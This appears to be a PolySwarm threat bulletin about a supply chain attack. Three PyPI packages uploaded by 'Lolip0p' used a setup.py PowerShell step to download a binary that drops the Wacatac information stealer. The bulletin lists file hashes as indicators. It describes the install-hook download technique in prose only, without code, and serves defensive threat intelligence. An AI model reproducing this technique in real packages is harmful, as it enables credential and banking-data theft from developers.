Related Families: Wacatac
Executive Summary
Fortinet recently reported on a supply chain attack in which threat actors leveraged a 0-day attack embedded in three PyPI packages to deliver Wacatac.
Key Takeaways
- In a recent supply chain attack, threat actors used a 0-day attack embedded in three PyPI packages to deliver a malicious payload.
- The malicious packages were all uploaded by the user Lolip0p.
- The payload was Wacatac, an information stealer.
Background
In our recent PolySwarm’s 2023 Analyst Predictions threat bulletin, we predicted threat actors would continue the software supply chain attacks trend, including targeting open-source code repositories. Fortinet recently reported on a supply chain attack in which threat actors leveraged a 0-day attack embedded in three PyPI packages. Affected packages included ‘colorslib’, ‘httpslib’, and ‘libhttps’. All three packages were published in early January by a user known as Lolip0p.
Based on their profile information, Lolip0p apparently joined the PyPI repository shortly before posting the first two packages on January 7th. The third package was published on January 12th. The packages were given a legitimate-looking description but were all malicious.
According to researchers at Fortinet, all three packages have an identical setup.py script. All three run a PowerShell script with a suspicious URL that leads to the download of a binary, Oxyz.exe. Oxyz.exe drops another executable, update.exe, that runs in a temp folder and drops multiple files into the folder. One of the dropped files is SearchProtocolHost.exe, which is detected as the Wacatac trojan.
What is Wacatac?
Wacatac is an information stealer that gathers multiple types of victim information, including login credentials and banking information. Threat actors can use Wacatac to deploy additional payloads, such as ransomware.
IOCs
PolySwarm has multiple samples associated with this activity.
8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b (Oxyz.exe)
293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757 (Update.exe)
You can use the following CLI command to search for all related samples in our portal:
$ polyswarm link list -f Lolip0p
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports